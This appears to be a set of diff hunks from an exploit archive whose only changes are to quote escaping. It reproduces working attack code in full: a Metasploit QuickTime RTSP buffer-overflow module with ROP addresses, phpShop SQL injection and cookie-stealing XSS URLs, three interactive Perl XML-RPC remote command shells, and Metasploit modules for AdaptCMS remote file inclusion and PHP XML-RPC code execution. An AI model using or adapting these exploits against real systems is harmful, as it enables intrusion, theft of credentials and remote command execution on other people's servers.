|
||||
'Arch' => ARCH_PPC,
|
||||
'Ret' => 0x8fe3f88c,
|
||||
'RetOffset' => 551,
|
||||
'PayloadOffset' => 879
|
||||
}
|
||||
],
|
||||
|
||||
[ \'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1\',
|
||||
[ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
|
||||
{
|
||||
\'Arch\' => ARCH_PPC,
|
||||
\'Ret\' => 0x8fe042e0,
|
||||
\'RetOffset\' => 615,
|
||||
\'PayloadOffset\' => 3351
|
||||
'Arch' => ARCH_PPC,
|
||||
'Ret' => 0x8fe042e0,
|
||||
'RetOffset' => 615,
|
||||
'PayloadOffset' => 3351
|
||||
}
|
||||
],
|
||||
|
||||
[ \'Mac OS X 10.4.8 x86, QuickTime 7.1.3\',
|
||||
[ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
|
||||
{
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Offset\' => 307,
|
||||
\'Writable\' => 0xa0bd0f10, # libSystem __IMPORT
|
||||
'Arch' => ARCH_X86,
|
||||
'Offset' => 307,
|
||||
'Writable' => 0xa0bd0f10, # libSystem __IMPORT
|
||||
# The rest of these are all in libSystem __TEXT
|
||||
\'ret\' => 0x9015d336,
|
||||
\'poppopret\' => 0x9015d334,
|
||||
\'setjmp\' => 0x900bc438,
|
||||
\'strdup\' => 0x90012f40,
|
||||
\'jmp_eax\' => 0x9014a77f
|
||||
'ret' => 0x9015d336,
|
||||
'poppopret' => 0x9015d334,
|
||||
'setjmp' => 0x900bc438,
|
||||
'strdup' => 0x90012f40,
|
||||
'jmp_eax' => 0x9014a77f
|
||||
}
|
||||
],
|
||||
|
||||
[ \'Mac OS X 10.5.0 x86, QuickTime 7.2.1\',
|
||||
[ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
|
||||
{
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Offset\' => 307,
|
||||
\'Writable\' => 0x8fe66448, # dyld __IMPORT
|
||||
'Arch' => ARCH_X86,
|
||||
'Offset' => 307,
|
||||
'Writable' => 0x8fe66448, # dyld __IMPORT
|
||||
# The rest of these addresses are in dyld __TEXT
|
||||
\'ret\' => 0x8fe1ceee,
|
||||
\'poppopret\' => 0x8fe220d7,
|
||||
\'setjmp\' => 0x8fe1ceb0,
|
||||
\'strdup\' => 0x8fe1cd77,
|
||||
\'jmp_eax\' => 0x8fe01041
|
||||
'ret' => 0x8fe1ceee,
|
||||
'poppopret' => 0x8fe220d7,
|
||||
'setjmp' => 0x8fe1ceb0,
|
||||
'strdup' => 0x8fe1cd77,
|
||||
'jmp_eax' => 0x8fe01041
|
||||
}
|
||||
],
|
||||
|
||||
],
|
||||
\'DefaultTarget\' => 2,
|
||||
\'DisclosureDate\' => \'Nov 23 2007\'))
|
||||
'DefaultTarget' => 2,
|
||||
'DisclosureDate' => 'Nov 23 2007'))
|
||||
end
|
||||
|
||||
######
|
||||
# XXX: This does not work on Tiger apparently
|
||||
def make_exec_payload_from_heap_stub()
|
||||
frag0 =
|
||||
\"\\x90\" + # nop
|
||||
\"\\x58\" + # pop eax
|
||||
\"\\x61\" + # popa
|
||||
\"\\xc3\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x61" + # popa
|
||||
"\xc3" # ret
|
||||
|
||||
frag1 =
|
||||
\"\\x90\" + # nop
|
||||
\"\\x58\" + # pop eax
|
||||
\"\\x89\\xe0\" + # mov eax, esp
|
||||
\"\\x83\\xc0\\x0c\" + # add eax, byte +0xc
|
||||
\"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax
|
||||
\"\\xc3\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x89\xe0" + # mov eax, esp
|
||||
"\x83\xc0\x0c" + # add eax, byte +0xc
|
||||
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
|
||||
"\xc3" # ret
|
||||
|
||||
setjmp = target[\'setjmp\']
|
||||
writable = target[\'Writable\']
|
||||
strdup = target[\'strdup\']
|
||||
jmp_eax = target[\'jmp_eax\']
|
||||
setjmp = target['setjmp']
|
||||
writable = target['Writable']
|
||||
strdup = target['strdup']
|
||||
jmp_eax = target['jmp_eax']
|
||||
|
||||
exec_payload_from_heap_stub =
|
||||
frag0 +
|
||||
[setjmp].pack(\'V\') +
|
||||
[writable + 32, writable].pack(\"V2\") +
|
||||
[setjmp].pack('V') +
|
||||
[writable + 32, writable].pack("V2") +
|
||||
frag1 +
|
||||
\"X\" * 20 +
|
||||
[setjmp].pack(\'V\') +
|
||||
[writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +
|
||||
\"X\" * 4
|
||||
"X" * 20 +
|
||||
[setjmp].pack('V') +
|
||||
[writable + 24, writable, strdup, jmp_eax].pack("V4") +
|
||||
"X" * 4
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
print_status(\"Got client connection...\")
|
||||
print_status("Got client connection...")
|
||||
|
||||
if (target[\'Arch\'] == ARCH_PPC)
|
||||
ret_offset = target[\'RetOffset\']
|
||||
payload_offset = target[\'PayloadOffset\']
|
||||
if (target['Arch'] == ARCH_PPC)
|
||||
ret_offset = target['RetOffset']
|
||||
payload_offset = target['PayloadOffset']
|
||||
|
||||
# Create pattern sized up to payload, since it always follows
|
||||
# the return address.
|
||||
boom = Rex::Text.pattern_create(payload_offset)
|
||||
|
||||
boom[ret_offset, 4] = [target[\'Ret\']].pack(\'N\')
|
||||
boom[ret_offset, 4] = [target['Ret']].pack('N')
|
||||
boom[payload_offset, payload.encoded.length] = payload.encoded
|
||||
else
|
||||
boom = Rex::Text.pattern_create(327)
|
||||
|
||||
boom[307, 4] = [target[\'ret\']].pack(\'V\')
|
||||
boom[311, 4] = [target[\'ret\']].pack(\'V\')
|
||||
boom[315, 4] = [target[\'poppopret\']].pack(\'V\')
|
||||
boom[319, 4] = [target[\'Writable\']].pack(\'V\')
|
||||
boom[323, 4] = [target[\'Writable\']].pack(\'V\')
|
||||
boom[307, 4] = [target['ret']].pack('V')
|
||||
boom[311, 4] = [target['ret']].pack('V')
|
||||
boom[315, 4] = [target['poppopret']].pack('V')
|
||||
boom[319, 4] = [target['Writable']].pack('V')
|
||||
boom[323, 4] = [target['Writable']].pack('V')
|
||||
|
||||
#
|
||||
# Create exec-payload-from-heap-stub, but split it in two.
|
||||
|
@ -160,23 +160,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
boom += payload.encoded
|
||||
end
|
||||
|
||||
body = \" \"
|
||||
body = " "
|
||||
header =
|
||||
\"RTSP/1.0 200 OK\\r\\n\"+
|
||||
\"CSeq: 1\\r\\n\"+
|
||||
\"Content-Type: #{boom}\\r\\n\"+
|
||||
\"Content-Length: #{body.length}\\r\\n\\r\\n\"
|
||||
"RTSP/1.0 200 OK\r\n"+
|
||||
"CSeq: 1\r\n"+
|
||||
"Content-Type: #{boom}\r\n"+
|
||||
"Content-Length: #{body.length}\r\n\r\n"
|
||||
|
||||
print_status(\"Sending RTSP response...\")
|
||||
print_status("Sending RTSP response...")
|
||||
client.put(header + body)
|
||||
|
||||
print_status(\"Sleeping...\")
|
||||
print_status("Sleeping...")
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
print_status(\"Starting handler...\")
|
||||
print_status("Starting handler...")
|
||||
handler(client)
|
||||
|
||||
print_status(\"Closing client...\")
|
||||
print_status("Closing client...")
|
||||
service.close_client(client)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -7,21 +7,21 @@ Web: http://www.andreafabrizi.it
|
|||
|
||||
|
||||
### SQL INJECTION
|
||||
http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111\' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011\'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2\' and \'1\'=\'1
|
||||
http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1' and '1'='1
|
||||
http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
|
||||
...and many others...
|
||||
|
||||
The SQL Injection security check can be bypassed replacing spaces with comments (/**/)
|
||||
|
||||
### BLIND SQL INJECTION
|
||||
http://server/phpshop-0.8.1/?page=shop/browse&category=aaa\' and 1=1 -- aaa
|
||||
http://server/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa
|
||||
|
||||
|
||||
### CSRF
|
||||
|
@ -30,5 +30,5 @@ http://server/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&
|
|||
|
||||
|
||||
### XSS
|
||||
http://server/phpshop-0.8.1/?page=order/order_print&order_id=1\"><script>alert(document.cookie);</script>
|
||||
http://server/phpshop-0.8.1/?page=order/order_print&order_id=1"><script>alert(document.cookie);</script>
|
||||
...and many others...
|
|
@ -22,41 +22,41 @@ $| = 1; # fflush stdout after print
|
|||
|
||||
# Default options
|
||||
# connection
|
||||
my $basic_auth_user = \'\';
|
||||
my $basic_auth_pass = \'\';
|
||||
my $proxy = \'\';
|
||||
my $proxy_user = \'\';
|
||||
my $proxy_pass = \'\';
|
||||
my $basic_auth_user = '';
|
||||
my $basic_auth_pass = '';
|
||||
my $proxy = '';
|
||||
my $proxy_user = '';
|
||||
my $proxy_pass = '';
|
||||
my $conn_timeout = 15;
|
||||
|
||||
# general
|
||||
my $host;
|
||||
|
||||
#informational lines to feed my own ego.
|
||||
print \"xmlrpc exploit - http://www.reversing.org \\n\";
|
||||
print \"2005 ilo-- <ilo\".chr(64).\"reversing.org> \\n\";
|
||||
print \"special chars allowed are / and - \\n\\n\";
|
||||
print "xmlrpc exploit - http://www.reversing.org \n";
|
||||
print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
|
||||
print "special chars allowed are / and - \n\n";
|
||||
|
||||
# read command line options
|
||||
my $options = GetOptions (
|
||||
|
||||
#general options
|
||||
\'host=s\' => \\$host, # input host to test.
|
||||
'host=s' => \$host, # input host to test.
|
||||
|
||||
# connection options
|
||||
\'basic_auth_user=s\' => \\$basic_auth_user,
|
||||
\'basic_auth_pass=s\' => \\$basic_auth_pass,
|
||||
\'proxy=s\' => \\$proxy,
|
||||
\'proxy_user=s\' => \\$proxy_user,
|
||||
\'proxy_pass=s\' => \\$proxy_pass,
|
||||
\'timeout=i\' => \\$conn_timeout);
|
||||
'basic_auth_user=s' => \$basic_auth_user,
|
||||
'basic_auth_pass=s' => \$basic_auth_pass,
|
||||
'proxy=s' => \$proxy,
|
||||
'proxy_user=s' => \$proxy_user,
|
||||
'proxy_pass=s' => \$proxy_pass,
|
||||
'timeout=i' => \$conn_timeout);
|
||||
|
||||
# command line sanity check
|
||||
&show_usage unless ($host);
|
||||
|
||||
# main loop
|
||||
while (1){
|
||||
print \"\\nxmlrpc@# \";
|
||||
print "\nxmlrpc@# ";
|
||||
my $cmd = <STDIN>;
|
||||
xmlrpc_xploit ($cmd);
|
||||
}
|
||||
|
@ -68,25 +68,25 @@ sub xmlrpc_xploit {
|
|||
chomp (my $data = shift);
|
||||
my $reply;
|
||||
|
||||
my $d1 = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a\');\";
|
||||
my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCall>\";
|
||||
my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";
|
||||
my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";
|
||||
|
||||
$data =~ s/-/\'.chr(45).\'/mg;
|
||||
$data =~ s/\\//\'.char(47).\'/mg;
|
||||
$data =~ s/-/'.chr(45).'/mg;
|
||||
$data =~ s/\//'.char(47).'/mg;
|
||||
|
||||
my $req = new HTTP::Request \'POST\' => $host;
|
||||
$req->content_type(\'application/xml\');
|
||||
$req->content($d1.\'system(\\\'\'.$data.\'\\\')\'.$d2);
|
||||
my $req = new HTTP::Request 'POST' => $host;
|
||||
$req->content_type('application/xml');
|
||||
$req->content($d1.'system(\''.$data.'\')'.$d2);
|
||||
|
||||
my $ua = new LWP::UserAgent;
|
||||
$ua->agent(\"xmlrpc exploit R/0.1\");
|
||||
$ua->agent("xmlrpc exploit R/0.1");
|
||||
$ua->timeout($conn_timeout);
|
||||
|
||||
if ($basic_auth_user){
|
||||
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
|
||||
}
|
||||
if ($proxy){
|
||||
$ua->proxy([\'http\'] => $proxy);
|
||||
$ua->proxy(['http'] => $proxy);
|
||||
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
|
||||
}
|
||||
|
||||
|
@ -95,7 +95,7 @@ my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCal
|
|||
if ($res->is_success){
|
||||
$reply= $res->content;
|
||||
} else {
|
||||
$reply = \"\";
|
||||
$reply = "";
|
||||
}
|
||||
$reply =~ /(.*).(<pre>warning.*)/mgsi;
|
||||
print ($1);
|
||||
|
@ -103,15 +103,15 @@ my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCal
|
|||
|
||||
# show options
|
||||
sub show_usage {
|
||||
print \"Syntax: ./xmlrpc.pl [options] host/uri\\n\\n\";
|
||||
print \"main options\\n\";
|
||||
print \"connection options\\n\";
|
||||
print \"\\t--proxy (http), --proxy_user, --proxy_pass\\n\";
|
||||
print \"\\t--basic_auth_user, --basic_auth_pass\\n\";
|
||||
print \"\\t--timeout \\n\";
|
||||
print \"\\nExample\\n\";
|
||||
print \"bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \\n\";
|
||||
print \"\\n\";
|
||||
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
|
||||
print "main options\n";
|
||||
print "connection options\n";
|
||||
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
|
||||
print "\t--basic_auth_user, --basic_auth_pass\n";
|
||||
print "\t--timeout \n";
|
||||
print "\nExample\n";
|
||||
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
|
||||
print "\n";
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
|
|
@ -2,16 +2,16 @@
|
|||
# /| #
|
||||
# | | #
|
||||
# | | #
|
||||
# /\\ ________| |___ #
|
||||
# / \\ \\_______ __/ #
|
||||
# / \\|\\_____ | | _ _ _ _ ()___ #
|
||||
# / /\\ \\ ___ \\ | |<_> / | | | || \\ || | | | #
|
||||
# / /__\\ \\| \\ || | _ /__ |_ | | ||_/ || | |_| #
|
||||
# / ______ \\ | || || | / | | | || \\ || | | #
|
||||
# / / \\ \\ | || || | / |_ |_ |_|| \\|| | \\_| #
|
||||
# \\_/ |\\_/ | || || | ___ _ _ #
|
||||
# | | | || /| | | | | ||\\/| #
|
||||
# \\| \\||/ \\| | |_ |_|| | #
|
||||
# /\ ________| |___ #
|
||||
# / \ \_______ __/ #
|
||||
# / \|\_____ | | _ _ _ _ ()___ #
|
||||
# / /\ \ ___ \ | |<_> / | | | || \ || | | | #
|
||||
# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
|
||||
# / ______ \ | || || | / | | | || \ || | | #
|
||||
# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
|
||||
# \_/ |\_/ | || || | ___ _ _ #
|
||||
# | | | || /| | | | | ||\/| #
|
||||
# \| \||/ \| | |_ |_|| | #
|
||||
# | | | || | #
|
||||
# | |_ | || | #
|
||||
# #
|
||||
|
@ -24,36 +24,36 @@
|
|||
|
||||
use IO::Socket;
|
||||
|
||||
print \"XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\\n\";
|
||||
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";
|
||||
|
||||
if ($ARGV[0] && $ARGV[1])
|
||||
{
|
||||
$host = $ARGV[0];
|
||||
$xml = $ARGV[1];
|
||||
$sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"connecterror\\n\";
|
||||
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
|
||||
while (1) {
|
||||
print \'[\'.$host.\']# \';
|
||||
print '['.$host.']# ';
|
||||
$cmd = <STDIN>;
|
||||
chop($cmd);
|
||||
last if ($cmd eq \'exit\');
|
||||
$xmldata = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>test.method</methodName><params><param><value><name>\',\'\'));echo \'_begin_\\n\';echo `\".$cmd.\"`;echo \'_end_\';exit;/*</name></value></param></params></methodCall>\";
|
||||
print $sock \"POST \".$xml.\" HTTP/1.1\\n\";
|
||||
print $sock \"Host: \".$host.\"\\n\";
|
||||
print $sock \"Content-Type: text/xml\\n\";
|
||||
print $sock \"Content-Length:\".length($xmldata).\"\\n\\n\".$xmldata;
|
||||
last if ($cmd eq 'exit');
|
||||
$xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
|
||||
print $sock "POST ".$xml." HTTP/1.1\n";
|
||||
print $sock "Host: ".$host."\n";
|
||||
print $sock "Content-Type: text/xml\n";
|
||||
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
|
||||
$good=0;
|
||||
while ($ans = <$sock>)
|
||||
{
|
||||
if ($good == 1) { print \"$ans\"; }
|
||||
if ($good == 1) { print "$ans"; }
|
||||
last if ($ans =~ /^_end_/);
|
||||
if ($ans =~ /^_begin_/) { $good = 1; }
|
||||
}
|
||||
if ($good==0) {print \"Exploit Failed\\n\";exit();}
|
||||
if ($good==0) {print "Exploit Failed\n";exit();}
|
||||
}
|
||||
}
|
||||
else {
|
||||
print \"Usage: perl xml.pl [host] [path_to_xmlrpc]\\n\\n\";
|
||||
print \"Example: perl xml.pl target.com /script/xmlrpc.php\\n\";
|
||||
print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
|
||||
print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
|
|
@ -10,35 +10,35 @@
|
|||
use LWP::UserAgent;
|
||||
|
||||
$brws = new LWP::UserAgent;
|
||||
$brws->agent(\"Internet Explorer 6.0\");
|
||||
$brws->agent("Internet Explorer 6.0");
|
||||
|
||||
$host = $ARGV[0];
|
||||
|
||||
if ( !$host )
|
||||
{
|
||||
die(\"Usage: xmlrpcexec.pl http://pathto/xmlrpcserver\");
|
||||
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
|
||||
}
|
||||
|
||||
while ( $host )
|
||||
{
|
||||
|
||||
print \"xmlrpc\\@\\#\";
|
||||
print "xmlrpc\@\#";
|
||||
|
||||
$exec = <STDIN>;
|
||||
$data = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>\',\'\')); system(\'$exec\'); die; /*</name></value></param></params></methodCall>\";
|
||||
$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
|
||||
|
||||
$send = new HTTP::Request POST => $host;
|
||||
$send->content($data);
|
||||
$gots = $brws->request($send);
|
||||
$show = $gots->content;
|
||||
|
||||
if ( $show =~ /<b>([\\d]{1,10})<\\/b><br \\/>(.*)/is )
|
||||
if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
|
||||
{
|
||||
print $2 . \"\\n\";
|
||||
print $2 . "\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
print \"$show\\n\";
|
||||
print "$show\n";
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
##
|
||||
# ) ) ) ( ( ( ( ( ) )
|
||||
# ( /(( /( ( ( /( ( ( ( )\\ ))\\ ) )\\ ))\\ ) )\\ ) ( /( ( /(
|
||||
# )\\())\\()))\\ ) )\\()) )\\ )\\ )\\ (()/(()/( ( (()/(()/((()/( )\\()) )\\())
|
||||
# ((_)((_)\\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\\ /(_))(_))/(_))(_)\\|((_)\\
|
||||
#__ ((_)((_)/(_))___ ((_)\\ _ )\\ )\\___)\\ _ )\\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
|
||||
#\\ \\ / / _ (_)) __\\ \\ / (_)_\\(_)(/ __(_)_\\(_) _ \\| \\| __| _ \\ | |_ _|| \\| | |/ /
|
||||
# \\ V / (_) || (_ |\\ V / / _ \\ | (__ / _ \\ | /| |) | _|| / |__ | | | .` | \' <
|
||||
# |_| \\___/ \\___| |_| /_/ \\_\\ \\___/_/ \\_\\|_|_\\|___/|___|_|_\\____|___||_|\\_|_|\\_\\
|
||||
# ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
|
||||
# )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
|
||||
# ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
|
||||
#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
|
||||
#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
|
||||
# \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|
||||
# |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
|
||||
# .WEB.ID
|
||||
##
|
||||
|
||||
|
@ -17,7 +17,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -28,53 +28,53 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
|
||||
'Description' => %q{
|
||||
This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
|
||||
|
||||
},
|
||||
\'Author\' => [ \'v3n0m\' , \'Yogyacarderlink-Indonesia\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision:$\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2010-2618\' ],
|
||||
[ \'BID\', \'41116\' ],
|
||||
[ 'CVE', '2010-2618' ],
|
||||
[ 'BID', '41116' ],
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
\'Compat\' =>
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
\'ConnectionType\' => \'find\',
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
\'Space\' => 262144, # 256k
|
||||
'Space' => 262144, # 256k
|
||||
},
|
||||
\'Platform\' => \'php\',
|
||||
\'Arch\' => ARCH_PHP,
|
||||
\'Targets\' => [[ \'Automatic\', { }]],
|
||||
\'DisclosureDate\' => \'Oct 12 2010\',
|
||||
\'DefaultTarget\' => 0))
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Oct 12 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new(\'PHPURI\', [ true , \"The URI to request, with the include parameter changed to !URL!\", \'/inc/smarty/libs/init.php?sitepath=!URL!\']),
|
||||
OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def php_exploit
|
||||
|
||||
timeout = 0.01
|
||||
uri = datastore[\'PHPURI\'].gsub(\'!URL!\', Rex::Text.to_hex(php_include_url, \"%\"))
|
||||
print_status(\"Trying uri #{uri}\")
|
||||
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
|
||||
print_status("Trying uri #{uri}")
|
||||
|
||||
response = send_request_raw( {
|
||||
\'global\' => true,
|
||||
\'uri\' => uri,
|
||||
'global' => true,
|
||||
'uri' => uri,
|
||||
},timeout)
|
||||
|
||||
if response and response.code != 200
|
||||
print_error(\"Server returned non-200 status code (#{response.code})\")
|
||||
print_error("Server returned non-200 status code (#{response.code})")
|
||||
end
|
||||
|
||||
handler
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -19,79 +19,79 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# XXX This module needs an overhaul
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'PHP XML-RPC Arbitrary Code Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary code execution flaw
|
||||
discovered in many implementations of the PHP XML-RPC module.
|
||||
This flaw is exploitable through a number of PHP web
|
||||
applications, including but not limited to Drupal, Wordpress,
|
||||
Postnuke, and TikiWiki.
|
||||
},
|
||||
\'Author\' => [ \'hdm\', \'cazz\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9929 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'hdm', 'cazz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9929 $',
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2005-1921\'],
|
||||
[\'OSVDB\', \'17793\'],
|
||||
[\'BID\', \'14088\'],
|
||||
['CVE', '2005-1921'],
|
||||
['OSVDB', '17793'],
|
||||
['BID', '14088'],
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Platform\' => [\'unix\', \'solaris\'],
|
||||
\'Payload\' => {
|
||||
\'Space\' => 512,
|
||||
\'DisableNops\' => true,
|
||||
\'Keys\' => [\'cmd\', \'cmd_bash\'],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['unix', 'solaris'],
|
||||
'Payload' => {
|
||||
'Space' => 512,
|
||||
'DisableNops' => true,
|
||||
'Keys' => ['cmd', 'cmd_bash'],
|
||||
},
|
||||
\'Targets\' => [ [\'Automatic\', { }], ],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Jun 29 2005\'
|
||||
'Targets' => [ ['Automatic', { }], ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 29 2005'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
